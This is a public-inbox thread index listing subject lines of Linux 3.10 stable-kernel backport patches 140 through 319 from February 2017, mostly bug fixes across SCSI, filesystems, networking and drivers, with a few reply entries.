2017-02-05 19:19 ` [PATCH 3.10 140/319] scsi: zfcp: spin_lock_irqsave() is not nestable Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination Willy Tarreau
2017-02-06 16:21   ` Sathya Prakash Veerichetty
2017-02-06 22:26     ` Willy Tarreau
2017-02-07  6:38       ` James Bottomley
2017-02-07  6:59         ` Willy Tarreau
2017-02-07 17:02           ` James Bottomley
2017-02-07 17:12             ` Willy Tarreau
2017-02-08  6:53               ` Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 142/319] mpt2sas: " Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 143/319] scsi: megaraid_sas: Fix data integrity failure for JBOD (passthrough) devices Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 144/319] scsi: megaraid_sas: fix macro MEGASAS_IS_LOGICAL to avoid regression Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 145/319] scsi: ibmvfc: Fix I/O hang when port is not mapped Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 146/319] scsi: Fix use-after-free Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 147/319] scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 148/319] scsi: scsi_debug: Fix memory leak if LBP enabled and module is unloaded Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 149/319] scsi: arcmsr: Send SYNCHRONIZE_CACHE command to firmware Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 150/319] ext4: validate that metadata blocks do not overlap superblock Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 151/319] ext4: avoid modifying checksum fields directly during checksum verification Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 152/319] ext4: use __GFP_NOFAIL in ext4_free_blocks() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 153/319] ext4: reinforce check of i_dtime when clearing high fields of uid and gid Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 154/319] ext4: allow DAX writeback for hole punch Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 155/319] ext4: sanity check the block and cluster size at mount time Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 156/319] reiserfs: fix "new_insert_key may be used uninitialized ..." Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 157/319] reiserfs: Unlock superblock before calling reiserfs_quota_on_mount() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 158/319] xfs: fix superblock inprogress check Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 159/319] libxfs: clean up _calc_dquots_per_chunk Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 160/319] btrfs: ensure that file descriptor used with subvol ioctls is a dir Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 161/319] ocfs2/dlm: fix race between convert and migration Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 162/319] ocfs2: fix start offset to ocfs2_zero_range_for_truncate() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 163/319] ubifs: Fix assertion in layout_in_gaps() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 164/319] ubifs: Fix xattr_names length in exit paths Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 165/319] UBIFS: Fix possible memory leak in ubifs_readdir() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 166/319] ubifs: Abort readdir upon error Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 167/319] ubifs: Fix regression in ubifs_readdir() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 168/319] UBI: fastmap: scrub PEB when bitflips are detected in a free PEB EC header Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 169/319] NFSv4.x: Fix a refcount leak in nfs_callback_up_net Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 170/319] NFSD: Using free_conn free connection Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 171/319] NFS: Don't drop CB requests with invalid principals Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 172/319] NFSv4: Open state recovery must account for file permission changes Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 173/319] fs/seq_file: fix out-of-bounds read Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 174/319] fs/super.c: fix race between freeze_super() and thaw_super() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 175/319] isofs: Do not return EACCES for unknown filesystems Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 176/319] hostfs: Freeing an ERR_PTR in hostfs_fill_sb_common() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 177/319] driver core: Delete an unnecessary check before the function call "put_device" Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 178/319] driver core: fix race between creating/querying glue dir and its cleanup Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 179/319] drm/radeon: fix radeon_move_blit on 32bit systems Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 180/319] drm: Reject page_flip for !DRIVER_MODESET Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 181/319] drm/radeon: Ensure vblank interrupt is enabled on DPMS transition to on Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 182/319] qxl: check for kmap failures Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 183/319] Input: i8042 - break load dependency between atkbd/psmouse and i8042 Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 184/319] Input: i8042 - set up shared ps2_cmd_mutex for AUX ports Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 185/319] Input: ili210x - fix permissions on "calibrate" attribute Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 186/319] hwrng: exynos - Disable runtime PM on probe failure Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 187/319] hwrng: omap - Fix assumption that runtime_get_sync will always succeed Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 188/319] hwrng: omap - Only fail if pm_runtime_get_sync returns < 0 Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 189/319] i2c-eg20t: fix race between i2c init and interrupt enable Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 190/319] em28xx-i2c: rt_mutex_trylock() returns zero on failure Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 191/319] i2c: core: fix NULL pointer dereference under race condition Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 192/319] i2c: at91: fix write transfers by clearing pending interrupt first Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 193/319] iio: accel: kxsd9: Fix raw read return Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 194/319] iio: accel: kxsd9: Fix scaling bug Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 195/319] thermal: hwmon: Properly report critical temperature in sysfs Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 196/319] cdc-acm: fix wrong pipe type on rx interrupt xfers Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 197/319] timers: Use proper base migration in add_timer_on() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 198/319] EDAC: Increment correct counter in edac_inc_ue_error() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 199/319] IB/srpt: Simplify srpt_handle_tsk_mgmt() Willy Tarreau
2017-02-06  5:14   ` Bart Van Assche
2017-02-06  6:32     ` Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 200/319] IB/ipoib: Fix memory corruption in ipoib cm mode connect flow Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 201/319] IB/core: Fix use after free in send_leave function Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 202/319] IB/ipoib: Don't allow MC joins during light MC flush Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 203/319] IB/mlx4: Fix incorrect MC join state bit-masking on SR-IOV Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 204/319] IB/mlx4: Fix create CQ error flow Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 205/319] IB/uverbs: Fix leak of XRC target QPs Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 206/319] IB/cm: Mark stale CM id's whenever the mad agent was unregistered Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 207/319] mtd: blkdevs: fix potential deadlock + lockdep warnings Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 208/319] mtd: pmcmsp-flash: Allocating too much in init_msp_flash() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 209/319] mtd: nand: davinci: Reinitialize the HW ECC engine in 4bit hwctl Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 210/319] perf symbols: Fixup symbol sizes before picking best ones Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 211/319] perf: Tighten (and fix) the grouping condition Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 212/319] tty: Prevent ldisc drivers from re-using stale tty fields Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 213/319] tty: limit terminal size to 4M chars Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 214/319] tty: vt, fix bogus division in csi_J Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 215/319] vt: clear selection before resizing Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 216/319] drivers/vfio: Rework offsetofend() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 217/319] include/stddef.h: Move offsetofend() from vfio.h to a generic kernel header Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 218/319] stddef.h: move offsetofend inside #ifndef/#endif guard, neaten Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 219/319] ipv6: don't call fib6_run_gc() until routing is ready Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 220/319] ipv6: split duplicate address detection and router solicitation timer Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 221/319] ipv6: move DAD and addrconf_verify processing to workqueue Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 222/319] ipv6: addrconf: fix dev refcont leak when DAD failed Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 223/319] ipv6: fix rtnl locking in setsockopt for anycast and multicast Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 224/319] ip6_gre: fix flowi6_proto value in ip6gre_xmit_other() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 225/319] ipv6: correctly add local routes when lo goes up Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 226/319] ipv6: dccp: fix out of bound access in dccp_v6_err() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 227/319] ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 228/319] ip6_tunnel: Clear IP6CB in ip6tunnel_xmit() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 229/319] ip6_tunnel: disable caching when the traffic class is inherited Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 230/319] net/irda: handle iriap_register_lsap() allocation failure Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 231/319] tcp: fix use after free in tcp_xmit_retransmit_queue() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 232/319] tcp: properly scale window in tcp_v[46]_reqsk_send_ack() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 233/319] tcp: fix overflow in __tcp_retransmit_skb() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 234/319] tcp: fix wrong checksum calculation on MTU probing Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 235/319] tcp: take care of truncations done by sk_filter() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 236/319] bonding: Fix bonding crash Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 237/319] net: ratelimit warnings about dst entry refcount underflow or overflow Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 238/319] mISDN: Support DR6 indication in mISDNipac driver Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 239/319] mISDN: Fixing missing validation in base_sock_bind() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 240/319] net: disable fragment reassembly if high_thresh is set to zero Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 241/319] ipvs: count pre-established TCP states as active Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 242/319] iwlwifi: pcie: fix access to scratch buffer Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 243/319] svc: Avoid garbage replies when pc_func() returns rpc_drop_reply Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 244/319] brcmsmac: Free packet if dma_mapping_error() fails in dma_rxfill Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 245/319] brcmsmac: Initialize power in brcms_c_stf_ss_algo_channel_get() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 246/319] brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 247/319] pstore: Fix buffer overflow while write offset equal to buffer size Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 248/319] net/mlx4_core: Allow resetting VF admin mac to zero Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 249/319] firewire: net: guard against rx buffer overflows Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 250/319] firewire: net: fix fragmented datagram_size off-by-one Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 251/319] netfilter: fix namespace handling in nf_log_proc_dostring Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 252/319] can: bcm: fix warning in bcm_connect/proc_register Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 253/319] net: fix sk_mem_reclaim_partial() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 254/319] net: avoid sk_forward_alloc overflows Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 255/319] ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 256/319] packet: call fanout_release, while UNREGISTERING a netdev Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 257/319] net: sctp, forbid negative length Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 258/319] sctp: validate chunk len before actually using it Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 259/319] net: clear sk_err_soft in sk_clone_lock() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 260/319] net: mangle zero checksum in skb_checksum_help() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 261/319] dccp: do not send reset to already closed sockets Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 262/319] dccp: fix out of bound access in dccp_v4_err() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 263/319] sctp: assign assoc_id earlier in __sctp_connect Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 264/319] neigh: check error pointer instead of NULL for ipv4_neigh_lookup() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 265/319] ipv4: use new_gw for redirect neigh lookup Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 266/319] mac80211: fix purging multicast PS buffer queue Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 267/319] mac80211: discard multicast and 4-addr A-MSDUs Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 268/319] cfg80211: limit scan results cache size Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 269/319] mwifiex: printk() overflow with 32-byte SSIDs Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 270/319] ipv4: Set skb->protocol properly for local output Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 271/319] net: sky2: Fix shutdown crash Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 272/319] kaweth: fix firmware download Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 273/319] tracing: Move mutex to protect against resetting of seq data Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 274/319] kernel/fork: fix CLONE_CHILD_CLEARTID regression in nscd Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 275/319] ipc: remove use of seq_printf return value Willy Tarreau
2017-02-05 19:49   ` Joe Perches
2017-02-05 20:35     ` Willy Tarreau
2017-02-06  8:06   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 276/319] arch: Introduce smp_load_acquire(), smp_store_release() Willy Tarreau
2017-02-06  8:06   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 277/319] kernel: Provide READ_ONCE and ASSIGN_ONCE Willy Tarreau
2017-02-06  8:06   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 278/319] kernel: Change ASSIGN_ONCE(val, x) to WRITE_ONCE(x, val) Willy Tarreau
2017-02-06  8:06   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 279/319] kernel: make READ_ONCE() valid on const arguments Willy Tarreau
2017-02-06  8:05   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 280/319] locking: Remove atomicy checks from {READ,WRITE}_ONCE Willy Tarreau
2017-02-06  8:05   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 281/319] compiler: Allow 1- and 2-byte smp_load_acquire() and smp_store_release() Willy Tarreau
2017-02-06  8:05   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 282/319] ipc/sem.c: fix complex_count vs. simple op race Willy Tarreau
2017-02-06  8:04   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 283/319] cfq: fix starvation of asynchronous writes Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 284/319] drbd: Fix kernel_sendmsg() usage - potential NULL deref Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 285/319] lib/genalloc.c: start search from start of chunk Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 286/319] tools/vm/slabinfo: fix an unintentional printf Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 287/319] rcu: Fix soft lockup for rcu_nocb_kthread Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 288/319] ratelimit: fix bug in time interval by resetting right begin time Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 289/319] mfd: core: Fix device reference leak in mfd_clone_cell Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 290/319] PM / sleep: fix device reference leak in test_suspend Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 291/319] mmc: mxs: Initialize the spinlock prior to using it Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 292/319] mmc: block: don't use CMD23 with very old MMC cards Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 293/319] pstore/core: drop cmpxchg based updates Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 294/319] pstore/ram: Use memcpy_toio instead of memcpy Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 295/319] pstore/ram: Use memcpy_fromio() to save old buffer Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 296/319] mb86a20s: fix the locking logic Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 297/319] mb86a20s: fix demod settings Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 298/319] cx231xx: don't return error on success Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 299/319] cx231xx: fix GPIOs for Pixelview SBTVD hybrid Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 300/319] gpio: mpc8xxx: Correct irq handler function Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 301/319] uio: fix dmem_region_start computation Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 302/319] KEYS: Fix short sprintf buffer in /proc/keys show function Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 303/319] hv: do not lose pending heartbeat vmbus packets Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 304/319] staging: iio: ad5933: avoid uninitialized variable in error case Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 305/319] mei: bus: fix received data size check in NFC fixup Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 306/319] ACPI / APEI: Fix incorrect return value of ghes_proc() Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 307/319] PCI: Handle read-only BARs on AMD CS553x devices Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 308/319] tile: avoid using clocksource_cyc2ns with absolute cycle count Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 309/319] dm flakey: fix reads to be issued if drop_writes configured Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 310/319] mm,ksm: fix endless looping in allocating memory when ksm enable Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 311/319] can: dev: fix deadlock reported after bus-off Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 312/319] hwmon: (adt7411) set bit 3 in CFG1 register Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 313/319] mpi: Fix NULL ptr dereference in mpi_powm() [ver #3] Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 314/319] mfd: 88pm80x: Double shifting bug in suspend/resume Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 315/319] ASoC: omap-mcpdm: Fix irq resource handling Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 316/319] regulator: tps65910: Work around silicon erratum SWCZ010 Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 317/319] dm: mark request_queue dead before destroying the DM device Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 318/319] fbdev/efifb: Fix 16 color palette entry calculation Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 319/319] metag: Only define atomic_dec_if_positive conditionally Willy Tarreau

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).